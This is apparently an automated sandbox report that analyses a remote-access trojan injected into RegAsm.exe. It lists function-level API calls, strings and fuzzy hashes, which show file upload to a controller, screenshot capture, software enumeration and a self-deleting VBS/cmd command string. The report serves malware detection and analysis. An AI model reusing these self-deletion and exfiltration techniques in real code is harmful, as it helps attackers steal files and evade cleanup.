              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
              • _wcslen.LIBCMT ref: 0040CFC6
              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
              • CloseHandle.KERNEL32 ref: 0040D02D
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
              • ExitProcess.KERNEL32 ref: 0040D062
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
              • String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
              • API String ID: 1579085052-545640883
              • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
              • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
              • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
              • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
              Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
              Download Yara Rule
              APIs
              • lstrlenW.KERNEL32(?), ref: 0041C036
              • _memcmp.LIBVCRUNTIME ref: 0041C04E
              • lstrlenW.KERNEL32(?), ref: 0041C067
              • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
              • lstrcmpW.KERNEL32(?,?), ref: 0041C114
              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
              • _wcslen.LIBCMT ref: 0041C13B
              • FindVolumeClose.KERNEL32 ref: 0041C15B
              • GetLastError.KERNEL32 ref: 0041C173
              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
              • lstrcatW.KERNEL32 ref: 0041C1B9
              • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
              • GetLastError.KERNEL32 ref: 0041C1D0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
              • String ID: ?
              • API String ID: 3941738427-1684325040
              • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
              • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
              • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
              • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
              Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
              • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
              • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
              • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
              • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
              • Sleep.KERNEL32(00000064), ref: 00412E94
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
              • String ID: /stext "$0TG$0TG$NG$NG
              • API String ID: 1223786279-2576077980
              • Opcode ID: 89d1699e6d7c756e3bbe6eba3beddd77d66d6b2828719220647806e229e7841a
              • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
              • Opcode Fuzzy Hash: 89d1699e6d7c756e3bbe6eba3beddd77d66d6b2828719220647806e229e7841a
              • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
              Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$EnvironmentVariable
              • String ID:
              • API String ID: 1464849758-0
              • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
              • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
              • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
              • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
              Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
              • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
              • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnumOpen
              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
              • API String ID: 1332880857-3714951968
              • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
              • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
              • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
              • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
              Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
              Download Yara Rule
              APIs
              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
              • GetCursorPos.USER32(?), ref: 0041D5E9
              • SetForegroundWindow.USER32(?), ref: 0041D5F2
              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
              • ExitProcess.KERNEL32 ref: 0041D665
              • CreatePopupMenu.USER32 ref: 0041D66B
              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
              • String ID: Close
              • API String ID: 1657328048-3535843008
              • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
              • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
              • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
              • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
              Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$Info
              • String ID:
              • API String ID: 2509303402-0
              • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
              • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
              • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
              • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
              Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
              • __aulldiv.LIBCMT ref: 00408D4D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
              • CloseHandle.KERNEL32(00000000), ref: 00408F64
              • CloseHandle.KERNEL32(00000000), ref: 00408FAE
              • CloseHandle.KERNEL32(00000000), ref: 00408FFC
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
              • API String ID: 3086580692-2582957567
              • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
              • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
              • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
              • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
              Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0045130A
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
              • _free.LIBCMT ref: 004512FF
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00451321
              • _free.LIBCMT ref: 00451336
              • _free.LIBCMT ref: 00451341
              • _free.LIBCMT ref: 00451363
              • _free.LIBCMT ref: 00451376
              • _free.LIBCMT ref: 00451384
              • _free.LIBCMT ref: 0045138F
              • _free.LIBCMT ref: 004513C7
              • _free.LIBCMT ref: 004513CE
              • _free.LIBCMT ref: 004513EB
              • _free.LIBCMT ref: 00451403
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
              • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
              • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
              Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00419FB9
              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
              • Sleep.KERNEL32(000003E8), ref: 0041A0FD
              • GetLocalTime.KERNEL32(?), ref: 0041A105
              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
              • API String ID: 489098229-1431523004
              • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
              • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
              • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
              • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
              Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
              • ExitProcess.KERNEL32 ref: 0040D9C4
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
              • API String ID: 1913171305-3159800282
              • Opcode ID: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
              • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
              • Opcode Fuzzy Hash: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
              • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
              Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
              • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
              • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
              • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
              Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
              • CloseHandle.KERNEL32(?), ref: 00404E4C
              • closesocket.WS2_32(000000FF), ref: 00404E5A
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
              • CloseHandle.KERNEL32(?), ref: 00404EBF
              • CloseHandle.KERNEL32(?), ref: 00404EC4
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
              • CloseHandle.KERNEL32(?), ref: 00404ED6
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
              • String ID:
              • API String ID: 3658366068-0
              • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
              • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
              • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
              • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
              Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
              • GetLastError.KERNEL32 ref: 00455CEF
              • __dosmaperr.LIBCMT ref: 00455CF6
              • GetFileType.KERNEL32 ref: 00455D02
              • GetLastError.KERNEL32 ref: 00455D0C
              • __dosmaperr.LIBCMT ref: 00455D15
              • CloseHandle.KERNEL32(00000000), ref: 00455D35
              • CloseHandle.KERNEL32(?), ref: 00455E7F
              • GetLastError.KERNEL32 ref: 00455EB1
              • __dosmaperr.LIBCMT ref: 00455EB8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
              • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
              • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
              • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
              Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
              Download Yara Rule
              APIs
              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
              • __alloca_probe_16.LIBCMT ref: 00453EEA
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
              • __alloca_probe_16.LIBCMT ref: 00453F94
              • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
              • __freea.LIBCMT ref: 00454003
              • __freea.LIBCMT ref: 0045400F
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
              • String ID: \@E
              • API String ID: 201697637-1814623452
              • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
              • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
              • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
              • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
              Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: \&G$\&G$`&G
              • API String ID: 269201875-253610517
              • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
              • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
              • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
              • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
              Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 65535$udp
              • API String ID: 0-1267037602
              • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
              • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
              • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
              • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
              Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
              • __dosmaperr.LIBCMT ref: 0043A8A6
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
              • __dosmaperr.LIBCMT ref: 0043A8E3
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
              • __dosmaperr.LIBCMT ref: 0043A937
              • _free.LIBCMT ref: 0043A943
              • _free.LIBCMT ref: 0043A94A
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
              • String ID:
              • API String ID: 2441525078-0
              • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
              • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
              • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
              • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
              Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
              Download Yara Rule
              APIs
              • SetEvent.KERNEL32(?,?), ref: 004054BF
              • GetMessageA.USER32 ref: 0040556F
              • TranslateMessage.USER32(?), ref: 0040557E
              • DispatchMessageA.USER32 ref: 00405589
              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
              • String ID: CloseChat$DisplayMessage$GetMessage
              • API String ID: 2956720200-749203953
              • Opcode ID: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
              • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
